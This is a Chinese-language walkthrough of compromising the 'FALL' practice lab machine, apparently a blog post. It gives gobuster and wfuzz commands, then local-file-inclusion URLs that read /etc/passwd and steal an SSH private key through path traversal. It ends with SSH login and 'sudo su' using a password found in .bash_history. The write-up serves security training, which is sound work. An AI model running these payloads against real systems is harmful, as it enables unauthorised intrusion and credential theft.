FALL靶机渗透攻略

1.安装并开启靶机

2.获取靶机IP

将靶机和Kali都设置为NAT模式

3.访问靶机地址

4.扫描目录和端口

gobuster dir -u http://192.168.40.147 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

5.访问敏感文件

提示缺少GET参数

爆破参数

wfuzz -u "http://192.168.40.147/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80

尝试读取passwd文件:http://192.168.40.147/test.php?file=/etc/passwd

尝试包含/home/qiu目录下默认保存的ssh密钥文件,通过前面扫描端口知道开了ssh,

我们需要知道ssh默认存私钥的目录:/home/user/.ssh/id_rsa

http://192.168.40.147/test.php?file=../../../../../../../../../home/qiu/.ssh/id_rsa

将私钥保存到Kali中,用私钥登录

chmod 400 id_rsa

ssh qiu@192.168.40.147 -i id_rsa

6.提权

查看用户qiu家目录下的.bash_history文件,找到密码:remarkablyawesomE

sudo su

相关推荐
小李@Free2FA13 小时前
跨境卖家多平台二次验证统一管理
安全·外贸·2fa·二次验证
fei_sun14 小时前
开放最短路径优先OSPF----基于链路状态
网络
精明的身影14 小时前
网络计划WebApp求解:融合Python与AI决策的项目管理系统
网络·python·web app
云祺vinchin14 小时前
混合云异构环境下的灾备实战:VMware+Hyper-V统一保护方案解析
安全·容灾备份·容灾备份体系
MartinYeung514 小时前
从注入攻击到诈骗:@martin_yeung/llm-up-guardrail 提供生产级 AI 安全防护
人工智能·安全
chengbei1215 小时前
SoloXSS:一款现代化的自托管 XSS平台
web安全·xss漏洞·xss平台
Let's Chat Coding15 小时前
对称密钥认证:主机和设备共享同一把密钥
运维·服务器·网络
一楼的猫17 小时前
AI写作检测机制技术深度解析:200+维度检测、叙事指纹与网文AI辅助怎么过审
人工智能·学习·安全·chatgpt·ai写作
技术不好的崎鸣同学17 小时前
[极客大挑战 2019]EasySQL 思路及解法
网络·安全·web安全
Web极客码17 小时前
跨国网络抖动下的 AI 爬虫流调优:我如何用 Claude 打造“智能退避”资讯清洗管道
网络·人工智能·爬虫